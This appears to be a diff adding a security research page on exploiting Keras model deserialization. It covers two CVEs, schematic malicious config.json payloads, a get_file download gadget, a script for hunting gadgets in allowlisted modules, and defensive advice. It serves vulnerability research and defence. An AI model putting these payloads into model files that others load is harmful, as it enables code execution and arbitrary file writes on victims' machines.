|
| 1 | +# Keras Model Deserialization RCE and Gadget Hunting |
| 2 | + |
| 3 | +{{#include ../../banners/hacktricks-training.md}} |
| 4 | + |
| 5 | +This page summarizes practical exploitation techniques against the Keras model deserialization pipeline, explains the native .keras format internals and attack surface, and provides a researcher toolkit for finding Model File Vulnerabilities (MFVs) and post-fix gadgets. |
| 6 | + |
| 7 | +## .keras model format internals |
| 8 | + |
| 9 | +A .keras file is a ZIP archive containing at least: |
| 10 | +- metadata.json – generic info (e.g., Keras version) |
| 11 | +- config.json – model architecture (primary attack surface) |
| 12 | +- model.weights.h5 – weights in HDF5 |
| 13 | + |
| 14 | +The config.json drives recursive deserialization: Keras imports modules, resolves classes/functions and reconstructs layers/objects from attacker-controlled dictionaries. |
| 15 | + |
| 16 | +Example snippet for a Dense layer object: |
| 17 | + |
| 18 | +```json |
| 19 | +{ |
| 20 | + "module": "keras.layers", |
| 21 | + "class_name": "Dense", |
| 22 | + "config": { |
| 23 | + "units": 64, |
| 24 | + "activation": { |
| 25 | + "module": "keras.activations", |
| 26 | + "class_name": "relu" |
| 27 | + }, |
| 28 | + "kernel_initializer": { |
| 29 | + "module": "keras.initializers", |
| 30 | + "class_name": "GlorotUniform" |
| 31 | + } |
| 32 | + } |
| 33 | +} |
| 34 | +``` |
| 35 | + |
| 36 | +Deserialization performs: |
| 37 | +- Module import and symbol resolution from module/class_name keys |
| 38 | +- from_config(...) or constructor invocation with attacker-controlled kwargs |
| 39 | +- Recursion into nested objects (activations, initializers, constraints, etc.) |
| 40 | + |
| 41 | +Historically, this exposed three primitives to an attacker crafting config.json: |
| 42 | +- Control of what modules are imported |
| 43 | +- Control of which classes/functions are resolved |
| 44 | +- Control of kwargs passed into constructors/from_config |
| 45 | + |
| 46 | +## CVE-2024-3660 – Lambda-layer bytecode RCE |
| 47 | + |
| 48 | +Root cause: |
| 49 | +- Lambda.from_config() used python_utils.func_load(...) which base64-decodes and calls marshal.loads() on attacker bytes; Python unmarshalling can execute code. |
| 50 | + |
| 51 | +Exploit idea (simplified payload in config.json): |
| 52 | + |
| 53 | +```json |
| 54 | +{ |
| 55 | + "module": "keras.layers", |
| 56 | + "class_name": "Lambda", |
| 57 | + "config": { |
| 58 | + "name": "exploit_lambda", |
| 59 | + "function": { |
| 60 | + "function_type": "lambda", |
| 61 | + "bytecode_b64": "<attacker_base64_marshal_payload>" |
| 62 | + } |
| 63 | + } |
| 64 | +} |
| 65 | +``` |
| 66 | + |
| 67 | +Mitigation: |
| 68 | +- Keras enforces safe_mode=True by default. Serialized Python functions in Lambda are blocked unless a user explicitly opts out with safe_mode=False. |
| 69 | + |
| 70 | +Notes: |
| 71 | +- Legacy formats (older HDF5 saves) or older codebases may not enforce modern checks, so “downgrade” style attacks can still apply when victims use older loaders. |
| 72 | + |
| 73 | +## CVE-2025-1550 – Arbitrary module import in Keras ≤ 3.8 |
| 74 | + |
| 75 | +Root cause: |
| 76 | +- _retrieve_class_or_fn used unrestricted importlib.import_module() with attacker-controlled module strings from config.json. |
| 77 | +- Impact: Arbitrary import of any installed module (or attacker-planted module on sys.path). Import-time code runs, then object construction occurs with attacker kwargs. |
| 78 | + |
| 79 | +Exploit idea: |
| 80 | + |
| 81 | +```json |
| 82 | +{ |
| 83 | + "module": "maliciouspkg", |
| 84 | + "class_name": "Danger", |
| 85 | + "config": {"arg": "val"} |
| 86 | +} |
| 87 | +``` |
| 88 | + |
| 89 | +Security improvements (Keras ≥ 3.9): |
| 90 | +- Module allowlist: imports restricted to official ecosystem modules: keras, keras_hub, keras_cv, keras_nlp |
| 91 | +- Safe mode default: safe_mode=True blocks unsafe Lambda serialized-function loading |
| 92 | +- Basic type checking: deserialized objects must match expected types |
| 93 | + |
| 94 | +## Post-fix gadget surface inside allowlist |
| 95 | + |
| 96 | +Even with allowlisting and safe mode, a broad surface remains among allowed Keras callables. For example, keras.utils.get_file can download arbitrary URLs to user-selectable locations. |
| 97 | + |
| 98 | +Gadget via Lambda that references an allowed function (not serialized Python bytecode): |
| 99 | + |
| 100 | +```json |
| 101 | +{ |
| 102 | + "module": "keras.layers", |
| 103 | + "class_name": "Lambda", |
| 104 | + "config": { |
| 105 | + "name": "dl", |
| 106 | + "function": {"module": "keras.utils", "class_name": "get_file"}, |
| 107 | + "arguments": { |
| 108 | + "fname": "artifact.bin", |
| 109 | + "origin": "https://example.com/artifact.bin", |
| 110 | + "cache_dir": "/tmp/keras-cache" |
| 111 | + } |
| 112 | + } |
| 113 | +} |
| 114 | +``` |
| 115 | + |
| 116 | +Important limitation: |
| 117 | +- Lambda.call() prepends the input tensor as the first positional argument when invoking the target callable. Chosen gadgets must tolerate an extra positional arg (or accept *args/**kwargs). This constrains which functions are viable. |
| 118 | + |
| 119 | +Potential impacts of allowlisted gadgets: |
| 120 | +- Arbitrary download/write (path planting, config poisoning) |
| 121 | +- Network callbacks/SSRF-like effects depending on environment |
| 122 | +- Chaining to code execution if written paths are later imported/executed or added to PYTHONPATH, or if a writable execution-on-write location exists |
| 123 | + |
| 124 | +## Researcher toolkit |
| 125 | + |
| 126 | +1) Systematic gadget discovery in allowed modules |
| 127 | + |
| 128 | +Enumerate candidate callables across keras, keras_nlp, keras_cv, keras_hub and prioritize those with file/network/process/env side effects. |
| 129 | + |
| 130 | +```python |
| 131 | +import importlib, inspect, pkgutil |
| 132 | + |
| 133 | +ALLOWLIST = ["keras", "keras_nlp", "keras_cv", "keras_hub"] |
| 134 | + |
| 135 | +seen = set() |
| 136 | + |
| 137 | +def iter_modules(mod): |
| 138 | + if not hasattr(mod, "__path__"): |
| 139 | + return |
| 140 | + for m in pkgutil.walk_packages(mod.__path__, mod.__name__ + "."): |
| 141 | + yield m.name |
| 142 | + |
| 143 | +candidates = [] |
| 144 | +for root in ALLOWLIST: |
| 145 | + try: |
| 146 | + r = importlib.import_module(root) |
| 147 | + except Exception: |
| 148 | + continue |
| 149 | + for name in iter_modules(r): |
| 150 | + if name in seen: |
| 151 | + continue |
| 152 | + seen.add(name) |
| 153 | + try: |
| 154 | + m = importlib.import_module(name) |
| 155 | + except Exception: |
| 156 | + continue |
| 157 | + for n, obj in inspect.getmembers(m): |
| 158 | + if inspect.isfunction(obj) or inspect.isclass(obj): |
| 159 | + sig = None |
| 160 | + try: |
| 161 | + sig = str(inspect.signature(obj)) |
| 162 | + except Exception: |
| 163 | + pass |
| 164 | + doc = (inspect.getdoc(obj) or "").lower() |
| 165 | + text = f"{name}.{n} {sig} :: {doc}" |
| 166 | + # Heuristics: look for I/O or network-ish hints |
| 167 | + if any(x in doc for x in ["download", "file", "path", "open", "url", "http", "socket", "env", "process", "spawn", "exec"]): |
| 168 | + candidates.append(text) |
| 169 | + |
| 170 | +print("\n".join(sorted(candidates)[:200])) |
| 171 | +``` |
| 172 | + |
| 173 | +2) Direct deserialization testing (no .keras archive needed) |
| 174 | + |
| 175 | +Feed crafted dicts directly into Keras deserializers to learn accepted params and observe side effects. |
| 176 | + |
| 177 | +```python |
| 178 | +from keras import layers |
| 179 | + |
| 180 | +cfg = { |
| 181 | + "module": "keras.layers", |
| 182 | + "class_name": "Lambda", |
| 183 | + "config": { |
| 184 | + "name": "probe", |
| 185 | + "function": {"module": "keras.utils", "class_name": "get_file"}, |
| 186 | + "arguments": {"fname": "x", "origin": "https://example.com/x"} |
| 187 | + } |
| 188 | +} |
| 189 | + |
| 190 | +layer = layers.deserialize(cfg, safe_mode=True) # Observe behavior |
| 191 | +``` |
| 192 | + |
| 193 | +3) Cross-version probing and formats |
| 194 | + |
| 195 | +Keras exists in multiple codebases/eras with different guardrails and formats: |
| 196 | +- TensorFlow built-in Keras: tensorflow/python/keras (legacy, slated for deletion) |
| 197 | +- tf-keras: maintained separately |
| 198 | +- Multi-backend Keras 3 (official): introduced native .keras |
| 199 | + |
| 200 | +Repeat tests across codebases and formats (.keras vs legacy HDF5) to uncover regressions or missing guards. |
| 201 | + |
| 202 | +## Defensive recommendations |
| 203 | + |
| 204 | +- Treat model files as untrusted input. Only load models from trusted sources. |
| 205 | +- Keep Keras up to date; use Keras ≥ 3.9 to benefit from allowlisting and type checks. |
| 206 | +- Do not set safe_mode=False when loading models unless you fully trust the file. |
| 207 | +- Consider running deserialization in a sandboxed, least-privileged environment without network egress and with restricted filesystem access. |
| 208 | +- Enforce allowlists/signatures for model sources and integrity checking where possible. |
| 209 | + |
| 210 | +## References |
| 211 | + |
| 212 | +- [Hunting Vulnerabilities in Keras Model Deserialization (huntr blog)](https://blog.huntr.com/hunting-vulnerabilities-in-keras-model-deserialization) |
| 213 | +- [Keras PR #20751 – Added checks to serialization](https://github.com/keras-team/keras/pull/20751) |
| 214 | +- [CVE-2024-3660 – Keras Lambda deserialization RCE](https://nvd.nist.gov/vuln/detail/CVE-2024-3660) |
| 215 | +- [CVE-2025-1550 – Keras arbitrary module import (≤ 3.8)](https://nvd.nist.gov/vuln/detail/CVE-2025-1550) |
| 216 | +- [huntr report – arbitrary import #1](https://huntr.com/bounties/135d5dcd-f05f-439f-8d8f-b21fdf171f3e) |
| 217 | +- [huntr report – arbitrary import #2](https://huntr.com/bounties/6fcca09c-8c98-4bc5-b32c-e883ab3e4ae3) |
| 218 | + |
| 219 | +{{#include ../../banners/hacktricks-training.md}} |
0 commit comments